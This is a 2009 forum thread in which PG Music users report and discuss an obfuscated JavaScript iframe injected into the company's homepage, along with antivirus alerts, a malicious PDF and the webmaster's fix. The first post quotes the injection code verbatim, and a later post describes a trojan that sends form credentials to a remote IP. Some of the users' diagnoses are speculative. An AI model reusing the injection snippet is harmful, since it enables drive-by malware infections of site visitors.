PG Music Home
Posted By: Grayson Virus loader on pgmusic.com homepage? - 07/05/09 10:07 PM
If you look at the source for the pgmusic.com home page, do you see the following line?:

<body ><script>document.write("<if"+''+'ra'+''+"m"+'e s'+"rc=\"h"+''+'tt'+"p:"+''+"/"+''+'/mic'+"roso"+'t'+''+'f.c'+"n"+'/'+"\" wid"+''+'th=1 he'+"igh"+''+'t'+"="+"2></i"+''+"f"+"ra"+''+""+''+"me"+'>');</script>

Seems to be an obfuscated link to "microsotf.cn" which gave me a virus warning.

Just curious if this is something happening on my end or if it's actually in the page itself.

Thanks.
Posted By: D. Tuna Re: Virus loader on pgmusic.com homepage? - 07/05/09 10:44 PM
yes i see it in the source.

are you the Grayson who works at PG?
Posted By: Ryszard Re: Virus loader on pgmusic.com homepage? - 07/06/09 12:13 AM
When I read this from my Internet machine, I looked at the status of Avast!, my AV program. It was OFF. I don't even know how to do that. I am doing a Thorough Scan as I write. If there's something going on I'll have to reinstall an AV program on my DAW as I tend to stay logged into PG.

I have received several emails in the last few weeks under friends' names, but which were clearly the result of worms. All the messages have contained links to Chinese websites, most purporting to sell computers. I have gotten reports of illicit Chinese activity from other sources as well. To my mind, Chinese black-hat crackers (what folks erroneously call "hackers", who are really the white hats) are ve-ry busy these days. Make sure your AV programs are on and up to date.

R.
"Seems to be an obfuscated link to "microsotf.cn" which gave me a virus warning."

I'm getting the same thing when I try to go to the PGMusic home page through my SBC Yahoo browser. When I use just the MS Explorer browser, it doesn't happen. BTW, I am using Avast and Spybot.
Posted By: rharv Re: Virus loader on pgmusic.com homepage? - 07/06/09 03:33 AM
Yeah, Avast jumped right in as soon as looked at the homepage - needs attention!
I hate those javascript redirectors - they can be anywhere in the code; sometimes in places that are not even suppose to get read (like between the head and body tags), which explains why some browsers are more susceptible than others... but regardless of browser the problem is there.
Posted By: toucher Re: Virus loader on pgmusic.com homepage? - 07/06/09 04:13 AM
Avast caught mine right away when I went to the page this morning. Since then it has not come up again.
Posted By: Curmudgeon Re: Virus loader on pgmusic.com homepage? - 07/06/09 05:34 AM
It didn't make a lot of sense on my part, but I checked the homepage out. Avast worked for me also with a malware warning.

Don S.
Posted By: Grayson Re: Virus loader on pgmusic.com homepage? - 07/06/09 06:43 AM
Thanks. I did send them email about it. Hopefully it'll get addressed ASAP.

BTW I don't work for PG Music, Mr Tuna.
Hi
I'm also getting a trojan virus warning from Kaspersky when opening up PGMusic homepage what does this mean and is it being looked at.
The warning from Kaspersky is Trojan-Downloader.JS.Iframe.bjn

Brian Cadoret
Posted By: rharv Re: Virus loader on pgmusic.com homepage? - 07/06/09 03:36 PM
I have heard that ridding a site of these types of infections is a tough task and time consuming so I assume they'll need a little time to resolve it.

I know of business sites that took a few weeks getting rid of it, only to get it again.
Keep your AV updated.
Use SpybotS&D too, as these redirectors hide from the Windows API and do not show up in antivirus scans or the running processes list. They can be tough to get rid of.

Here's a description of one such javascript redirecor -

After execution of e.g. 9129837.exe PWS.Small.bs installs a service (hide_evr2) and copies itself and the service file to the Windows directory. Additionally an autorun entry (ttool) is created which loads the 9129837.exe on every windows startup. The service affects that the two files and the autorun entry are hidden from the windows API, i.e. the user cannot see the files. If you visit webpages with forms like ebay or online banking pages the filled-in information like userid and password/pin are sent to http://81.95.147.107/cgi-bin/**** ADDITIONAL REMOVAL INSTRUCTION: Please reboot your PC in Safe Mode and perform another scan of Spybot - Search & Destroy to remove the remainings.

Having unfamiliar proccesses running like the above mentioned "9129837.exe " is not a good sign..
Posted By: Ryszard Re: Virus loader on pgmusic.com homepage? - 07/06/09 03:47 PM
My Avast! scan didn't show anything, but there was an info page somewhere that did list the 'microsotf.cn' thingie as an infection. More importantly, though, when I checked Avast! it was OFF again--not just that the scanners were disabled, but the program was not resident in memory. This is very concerning. I've started it again and will be keeping a close eye on it.

Edit: Followup: I can run a scan with Avast! but it does not run on Windows startup and will not stay in memory. I'm downloading AVG as I write.

So, we think this thing is a keystroke logger?

R.
Posted By: Curmudgeon Re: Virus loader on pgmusic.com homepage? - 07/06/09 03:52 PM
Richard,

I had the same problem with Avast a while back. I deleted and then reinstalled it. So far, so good.

Don S.
Posted By: rharv Re: Virus loader on pgmusic.com homepage? - 07/06/09 03:57 PM
It is likely a keylogger - please go back and read my previous post - an antivirus will NOT find it
use SPYBOT quickly

I would disconnect from internet, (you may have to be on internet to install Spybot Search and Destroy) then scan, then scan again in safe mode as per Spybot instructions.

It is *probably* taking keylogging info and sending to a site somewhere... that is the purpose of these types of trojans

I am NOT trying to cause widespread panic, but it is a serious threat when one of these gets in, I have first and second hand experience removing this for others. Tend to your machine, especially if you have banking accounts or access to other web sites thru FTP on that machine.
If you watch when it first gets in you can see it connecting to .cn sites to update itself and start running...
I tested a couple infected sites and closely watched the results.
It gets into a web site through FTP by an infected admin, so all access should be closed and known clean backups used. Hopefully these exist on a source seperate from the main site.

A clean machine should also be used to reset all passwords for any admins to get access. Otherwise passwords are still held at the remote site for later reinfection.
It's an ugly ugly situation once it gets in.
I can list other sites infected right now, and have actually reported them to Google but they have not responded by associating a warning with these sites yet.
Posted By: rharv Re: Virus loader on pgmusic.com homepage? - 07/06/09 04:11 PM
As a side note - some versions are capable of adapting to the php used in forums, hopefully pgmusic is on top of this and the site is hosted seperately.

If PGMusic wants to check, look at the php script in the index.php files for added cryptic php code.
It will not be easy to see using the 'view source' but will easy to see using the source codes on the server.
Also trojans seems to like the 'include' folders and javascript folders.
This, however is much more rare than the current version that is infecting sites.

I suggest keeping a copy of install files for Spybot and Antivirus on a drive somewhere. I have seen these types of trojans block access to Avast, McAfee and Symantec, and probably others..

just trying to help with what I have seen.
Posted By: JBlatz Re: Virus loader on pgmusic.com homepage? - 07/06/09 04:41 PM
I'm running Linux and just safely saved the 25.8 KB malware download to disk. It's name is 955.pdf, so perhaps it it using an Acrobat exploit. I found another site that thinks their site was infected with it on 7/4.
(http://olegvolk.livejournal.com/628779.html)

If anyone needs the internal contents of the file, let me know. I will keep it a few days before deleting the file. For those using AVG antivirus protection, I ran an AVG scan on the file and AVG passed it as being OK, so be careful.

By the way, I urge all of you to only use Linux for surfing the internet.
Posted By: rharv Re: Virus loader on pgmusic.com homepage? - 07/06/09 06:02 PM
Linux is fine until you run into a virus designed to exploit Linux.
There are just about as many security updates for Linux as there are for Windows these days.. depending on the brand of Linux you want to run.

I use Linux Live CD's to get into infected systems and repair sometimes, so I know it has benefits for trojans designed to exploit windows, but it is by no means completely safe.

I would be interested in viewing the file contents, but I'd need to access it on a safer machine. Besides, a lot of mail servers will indeed catch it and stop delivery, as a lot of them are running linux also!
Congrats on outsmarting this one, and thanks for the extra efforts.
Other sites with the infection include dademoldinspectors and enviropro.net... among hundreds of others.
If you are interested in helping for these types of things, check out badwarebusters.org
Posted By: Mac Re: Virus loader on pgmusic.com homepage? - 07/06/09 06:22 PM
Has the pgmusic homepage been fixed?
I used the Live Help to ask. This is the reply I got:

"Jareth: Welcome to PG Music's live help. May we please have your first and last name to better assist you?
you: HI, this is Gary Curran. Do you know if anyone has found and removed the virus loader program from the main web page yet?
you: There is a thread in the Off Topic forum about it, several of us running Avast A/V have had Malware warnings about it.
Jareth: I'm currently asking our webmaster
Jareth: give me one moment
you: thank you, Jareth.
Jareth: webmaster says there is a script and that it is likely not dangerous - the contents are currently being analyzed and we will inform everyone as soon as we have reached a conclusion
you: okay. Thanks a lot.
you: have a great day.
Jareth: you're welcome, bye
you: END CHAT
Jareth: you too

Gary
Posted By: rharv Re: Virus loader on pgmusic.com homepage? - 07/06/09 07:45 PM
JBlatz - what makes you think that the malware is called 955.pdf?
That appears to be a valid program/ format.
http://www.pdf995.com/

What I saw was a downloader script - a couple different warnings actually.. when I went to the home page.
Hi
Just visited the PGMusic homepage and Kaspersky is NOT giving me trojan warnings anymore , I hope this is a good sign.

Brian Cadoret
This is what it is/was

7/6/2009 11:24:42 AM SYSTEM 312 Sign of "JS:Pdfka-JV [Expl]" has been found in "http://microsotf.cn/img/pfqd.php" file.

It is an infected PDF file. I use Firefox with Nitro PDF tool. The minute Avast flagged this Nitor opened and asked what to do with this file.
Yes, it looks like a line of code got injected to our web page from somewhere external on the Internet (via a vulnerability in the system that has since been fixed), that was wanting to download a PDF file. (reportedly PDF files can be malicious if you have an older version of your PDF reader)

Apparently these things hunt the internet looking for specific vulnerabilities.

This has been removed fron the web page, and things should be back to normal now.

From a google search, if the PDF was downloaded, and managed to infect, it most likely would be delivering unwanted popup ads and possibly other things. You should do a adware/virus scan to make sure things are OK.

There are many good spyware/virus programs, including free scanners (e.g. http://www.kaspersky.com/virusscanner)
I apologize for this inconvenience.
Posted By: rharv Re: Virus loader on pgmusic.com homepage? - 07/06/09 09:02 PM
Thanks Peter, it's good to hear its handled
Peter,
It bothers me that you have to apologize for the inconvenience, since you are doing nothing more than running your business. The people who write these things should be found, prosecuted, and then punished for the harm they cause.

While this may have not been anything other than an infected .pdf file, it may have caused loss of business, loss of time for customers, loss of revenue for customers, loss of time for your employees and such.

In a sense, these individuals are no better than the terrorists and pirates populating our world today. And, at some point, they are going to become just as deadly.

Thanks for getting it cleared up, Peter.

Gary
Posted By: Don Gaynor Re: Virus loader on pgmusic.com homepage? - 07/07/09 12:09 AM
Quote:

In a sense, these individuals are no better than the terrorists and pirates populating our world today. And, at some point, they are going to become just as deadly.

the millions or possibly billions of dollars in lost man-hours alone probably far exceeds all other forms of 'piracy' already. to bad someone couldn't come up with a plan to root these people out then prosecute them to the fullest extent of the law. microsoft puts a bounty on their heads but i don't know how affective that has been. maybe a portion of software sales should go into a fund dedicated to exposing these 'terrorists.' the money and effort we all spend on av software would be a good start toward the fund.

just 2 cents from a victim of a trojan that put me out of business with band in a box.
Posted By: JBlatz Re: Virus loader on pgmusic.com homepage? - 07/07/09 01:53 AM
Bob,

The file that popped up when I viewed the PG home page was actually named 955.pdf. Instead of viewing it, I downloaded the file. When I opened it in the Open Office reader, it was blank. However, viewing the file in a hex editor listed more details. Probably like Peter said, it is a specially crafted pdf designed to take advantage of a Window's vulnerability.
According to Adobe:

Platform: Windows XP or Windows 2003 (Vista users are not affected) with Internet Explorer 7 installed

Affected software versions: Adobe Reader 8.1 and earlier, Adobe Reader 7.0.9 and earlier
Adobe Acrobat Professional, 3D and Standard 8.1 and earlier versions, Adobe Acrobat Professional, Standard, 3D and Elements 7.0.9 and earlier

Anyone with the above are in danger of the pdf file using the mail to capacity in adobe to forward information to a 3rd party. I recall using this feature when designing test papers for the fire department, on completion of the test the answers and the users name, date, and badge number were emailed to the Training Office. I'm a little muddy as to how this works in the instance of the webpage, unless it's loading itself as a TSR type piece of software and sending information from forms to another site.

I will not use IE7, and only use that browser if forced to by Microsoft.
Posted By: rharv Re: Virus loader on pgmusic.com homepage? - 07/07/09 12:15 PM
Strange, I thought I intentionally used the Firefox browser when I went there..

Using the form feature and mailto feature make sense to me. Anytime you fill out a form, it gets mailed to some guy in China; (think username, password type forms boxes)
Some would call that a keylogger, I certainly would, it is a selective keylogger that only mails out keystrokes entered in forms (probably secure forms). Sounds just about like Spybot decribed it. They claim it is logging any form information and sending it to a remote system. Now if they know the system it is getting sent to... seems like it would be an easy shot for the right 'forensic inspector'.
Yeah, I know, they can hijack innocent computers and use those as stoops.. but it would be a start.
I have links right to the forum, don't go to the homepage. So do you assume that if you go to order something on-line from PG's store that the info ended up going out to Tim-buck-two?
Posted By: rharv Re: Virus loader on pgmusic.com homepage? - 07/07/09 04:10 PM
I don't assume anything
I believe PGMusic would have by design any orders going through a seperate secure server.
A secure server will be much harder to infiltrate than a basic webpage server.. although accidental infection is surely possible from admin access.
Since the forum seemed to stay safe during the issue, I believe they have the different components on seperate servers or server partitions. I don't know of any trojan that can jump partitions or domains on a server. Otherwise I would be battling about 15 infected sites right now. One of the infected sites I listed above is still infected after two months (recurring issue) and is on a server that also contains a website I administor. This is how I knew about it to begin with; the guy called us to make sure we knew about his issue and to make sure it hadn't affected our sites, since all sites he administered on that server were getting infected.
I told him it was a sign that he was the one with crap on his shoes and everytime he went in to check his sites he was smearing a little around.
We know exactly what to look for and have seen no sign on our sites.
Posted By: Mac Re: Virus loader on pgmusic.com homepage? - 07/07/09 04:13 PM
What rharv said.

Stay cool, no panic, no rumors please.

--Mac
© PG Music Forums